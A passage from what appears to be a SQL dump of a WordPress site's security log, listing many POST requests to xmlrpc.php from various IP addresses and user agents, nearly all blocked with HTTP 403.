Safari\\/537.36\"}','uiXdnSPyGgOv3aHA5T7LMEtw',0,1681189891.8983,5110,'','POST',403,0,515,0,1,'',0),('152.89.160.131',2556010627,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','g6CQScIUnLy4wxYHKv8dsWzq',0,1681206475.4703,3983,'','POST',403,0,515,0,1,'',0),('89.249.74.218',1509509850,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BfMaSCcpsdI7y9Fi81N5Hqho',0,1681205240.8220,591,'','POST',403,0,515,0,1,'',0),('89.249.74.218',1509509850,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w2p4XNqrBu1no9jFAehl8xTt',0,1681205205.7399,562,'','POST',403,0,515,0,1,'',0),('91.207.102.163',1540318883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Dq7BNhdGzZO5MUyj69QaHglx',0,1681205181.8450,1315,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','EsiUHYa0wfZRBmuh5vpk4n8K',0,1681204990.0325,571,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','MRlg31mhoT6WkKUFtDfXiYv5',0,1681204987.1831,577,'','POST',403,0,515,0,1,'',0),('200.58.111.20',3359272724,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','4Ke3kHRbgrEuqcPnjpm2OIMo',0,1681204984.3614,550,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','W3u21QgfKMVGr5xdvyiC79Ps',0,1681204976.2619,540,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','4UpZkhAIWj9BMGqoPXrDfJwe',0,1681204974.5166,653,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','NuMKLRZO5iv0Wx3km64jYD7g',0,1681204973.3215,568,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','U3dkmJ8erFYsgi72RWchOn4w',0,1681204966.0257,1641,'','POST',403,0,515,0,1,'',0),('146.70.61.131',2454076803,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hzUKR4P7gW2LVp3uSGyAsTBC',0,1681204665.1143,675,'','POST',403,0,515,0,1,'',0),('107.167.244.83',1806169171,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OfoZ1SpGuVihge9mbqjPxnFY',0,1681204568.7711,4594,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','qrg9J8V0QGe4LPIFMEtucjYH',0,1681203066.6058,657,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','KyQDAqilIcVUmfT5z1tovbkM',0,1681203065.8226,620,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','4hut5UfTb18VyoxBHDQilR2Z',0,1681203060.7567,570,'','POST',403,0,515,0,1,'',0),('114.215.93.65',1926716737,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','ZhXiYSx2ndF6BQymzPsjwcCG',0,1681203053.9889,3780,'','POST',403,0,515,0,1,'',0),('45.77.227.79',760079183,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','cz42dfsLnuYEKWR0Bmt5ybl3',0,1681202092.2845,1826,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','2MB1Pb3RnDGZ9EsHhvq8z4V5',0,1681202076.7729,753,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','0EHKWJtnsraFfwvjNDc2h5u8',0,1681202076.0964,863,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','PKoNcuvIzednDAt9wCbS0Ryr',0,1681202062.9624,586,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','i4ByRjpHwqufk3AoFU9Et18l',0,1681202061.9597,544,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','7H3yi9nQV01rDXOs68dGLbtP',0,1681202059.9220,568,'','POST',403,0,515,0,1,'',0),('39.108.51.67',661402435,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','RCoP69EiQj5gOnk1dyBwIhJx',0,1681202054.1184,4117,'','POST',403,0,515,0,1,'',0),('146.70.76.35',2454080547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OSGCzocNgErkABWFX03mZPla',0,1681200819.3149,2807,'','POST',403,0,515,0,1,'',0),('184.168.115.25',3098047257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','Yq14GNl7s2yhkf3EvAnmuUK6',0,1681200690.1440,564,'','POST',403,0,515,0,1,'',0),('51.75.194.213',860603093,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','Ayobj4NVQxHqz2DF9ser5mnl',0,1681200687.7683,1104,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','mUGWlfryAPnodaIv6pQsSMEb',0,1681200687.4034,1168,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','hNoxjakFqG3W158sSprgBPJb',0,1681200672.0602,575,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Fv3NbTWCs2z1U6EIDLkXuqcO',0,1681200670.8711,573,'','POST',403,0,515,0,1,'',0),('150.60.157.163',2520554915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','AlsNEtjJQTMvCau074GOrgYh',0,1681200661.0350,4566,'','POST',403,0,515,0,1,'',0),('185.200.116.203',3116922059,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','S6necNxEYz5KXtvHm0kZdqpU',0,1681208616.2324,3995,'','POST',403,0,515,0,1,'',0),('194.187.251.155',3267099547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','v0DToKZiFuqgCe9YPQ8Wtc17',0,1681208511.0069,3796,'','POST',403,0,515,0,1,'',0),('185.200.116.211',3116922067,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fxtbWlqJNa2Syp3cXUOGQAVn',0,1681223180.4065,650,'','POST',403,0,515,0,1,'',0),('213.152.161.30',3583549726,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QAqOV0HuI1kprcvDNlB9yG3K',0,1681223476.5771,1712,'','POST',403,0,515,0,1,'',0),('199.249.230.17',3355043345,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kxG8L7FbJEtSogayVlOQ93rD',0,1681228513.6793,6678,'','POST',403,0,515,0,1,'',0),('185.156.174.115',3114053235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tEkVZYI6divj5HbFSmsxwaMr',0,1681226190.3170,4165,'','POST',403,0,515,0,1,'',0),('104.254.90.243',1761499891,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Phkum6493BUpj2CXatETidqM',0,1681227385.8445,752,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','kcX6BwPUYJM5ulbQezC0GO2i',0,1681229906.7825,553,'','POST',403,0,515,0,1,'',0),('152.228.217.240',2565134832,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','ZDLI46xlWgNPbKSQpVOFCBnh',0,1681229896.0761,1319,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','3WDUaSYpGXrN6LB1ynjfuMlR',0,1681229895.7763,1494,'','POST',403,0,515,0,1,'',0),('103.251.44.226',1744514274,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','czr5IuU1vjSkXQlKsy7q3oBx',0,1681229894.6484,933,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','xDq6fj0nkS93GZXCBh2gdb7m',0,1681229887.4572,576,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','M0TG4PfuFzsYKQN1vW6C5qIa',0,1681229886.5695,861,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','x5K7fjiRXDmLyNUQMIZ6VqBw',0,1681229256.5490,592,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','zNo6fAc0FwyUaO3VbuSIKZ7s',0,1681229255.1543,584,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','zlAatqG5WX4nKP02emj9wNiE',0,1681229251.8476,566,'','POST',403,0,515,0,1,'',0),('46.182.84.66',783701058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','bCdiF6tyuNqOY87TKwUDpWGS',0,1681229242.8806,616,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','1sE5lTvKLrgQPahVm0Uw8tI9',0,1681229236.0600,2079,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','4jyDZaPoYFGkuQ6Acw2f1sxN',0,1681229230.2418,951,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','1nEpmqQPxRfTXwG0FCgZUilB',0,1681229229.2572,1419,'','POST',403,0,515,0,1,'',0),('43.143.239.49',730853169,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','VMWajFr5AY4yNPtzxqKvbDI0',0,1681229228.7913,1054,'','POST',403,0,515,0,1,'',0),('85.25.213.84',1427756372,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','3Ndywf6iOB1bcegWEHKj7UCJ',0,1681229217.3711,2019,'','POST',403,0,515,0,1,'',0),('78.46.136.94',1311672414,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','6HdI8lZzXSRbUs53LOV0EDhY',0,1681229209.3828,592,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','fnoC9AehkrUp3yNXsclH6wPz',0,1681229205.3565,3474,'','POST',403,0,515,0,1,'',0),('62.102.148.166',1046910118,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZTA7Fp8lHNo23w0JLmcMWgn1',0,1681229047.9786,3666,'','POST',403,0,515,0,1,'',0),('68.178.247.133',1152579461,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','itVu4ao0qxQ92LeAXHcRpbBN',0,1681235071.1201,1093,'','POST',403,0,515,0,1,'',0),('91.134.248.192',1535572160,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','KbfAiYOgs09WxvZrCqPlyJ8w',0,1681235067.4153,612,'','POST',403,0,515,0,1,'',0),('68.178.224.199',1152573639,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','CrHmhJvwgQa4dVGMLUs6PNlE',0,1681235060.5410,1512,'','POST',403,0,515,0,1,'',0),('163.47.21.95',2737771871,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','CwtYNIhTZ5bUJAruxyML0o7W',0,1681235058.6694,1199,'','POST',403,0,515,0,1,'',0),('195.69.187.24',3276127000,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','bECfX3N1VndYHpDLGPr0JeAi',0,1681235058.2910,1273,'','POST',403,0,515,0,1,'',0),('51.144.123.73',865106761,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','zRqEikeLaIF3mW8HOZjQBhtM',0,1681235054.9605,999,'','POST',403,0,515,0,1,'',0),('171.244.61.154',2884910490,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','pq5dsiELo8GRAmJIyBQlFnh3',0,1681235053.4526,1510,'','POST',403,0,515,0,1,'',0),('82.165.87.163',1386567587,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','mGvgIWtyf35iclrF9hjoak4P',0,1681235050.5708,4277,'','POST',403,0,515,0,1,'',0),('199.249.230.42',3355043370,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1oRTQEFIXv5z9wDU6nZHOheP',0,1681233820.3780,1455,'','POST',403,0,515,0,1,'',0),('213.152.186.40',3583556136,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','034yFr9S7fWv5YXoLBgKmuwd',0,1681233472.7399,4152,'','POST',403,0,515,0,1,'',0),('64.42.179.43',1076540203,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hRYDIJofg0Xqk8PMK2ixyazb',0,1681242163.1038,560,'','POST',403,0,515,0,1,'',0),('213.152.161.170',3583549866,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sUy6jqOtzNeroZCT1Kaw4WMV',0,1681242122.7771,3800,'','POST',403,0,515,0,1,'',0),('201.148.104.84',3381946452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','kOxXhltKeaSU5479NTAZGnRj',0,1681240303.7169,560,'','POST',403,0,515,0,1,'',0),('189.112.112.157',3178262685,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','7WgJpdrIYUKlMkSX6N4aAucv',0,1681240301.8705,1599,'','POST',403,0,515,0,1,'',0),('182.50.132.117',3056764021,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','x23pGcIhHJYow8MPrDvkUsWR',0,1681240301.8705,1568,'','POST',403,0,515,0,1,'',0),('95.111.255.131',1601175427,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','9yHXAwMfOLjNZCEz5VkcIi7B',0,1681240299.2615,1229,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','0YtTpMnI8sQUG5OSvXmjoZJL',0,1681240299.4760,909,'','POST',404,0,515,0,1,'',0),('121.40.223.33',2032721697,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','9wnFLs1yolIkTWeiR2gNEBJ8',0,1681240292.4571,3226,'','POST',403,0,515,0,1,'',0),('68.178.235.233',1152576489,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','DsiNLqgh9vZcnySIGzpwTJQW',0,1681240291.2415,4319,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','IalwZqMR4J3u90Ar5Nfp2BQe',0,1681240291.1531,4307,'','POST',403,0,515,0,1,'',0),('192.99.19.65',3227718465,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','t1kGEodVbzO4LvJ3lWuQNCXI',0,1681240288.3001,3846,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','FEhNa820fpdu347moKtscj6n',0,1681240287.9452,3999,'','POST',403,0,515,0,1,'',0),('146.88.234.56',2455300664,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','By7645x3iGCDPpXVS1kUmfRb',0,1681240285.8406,3320,'','POST',403,0,515,0,1,'',0),('95.0.0.250',1593835770,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','Yl0R6aGhB497gzJWZvTmE3ow',0,1681240285.3404,2137,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','F4vAHQ5Wwronpig2fx0ZGsKR',0,1681240283.6452,564,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 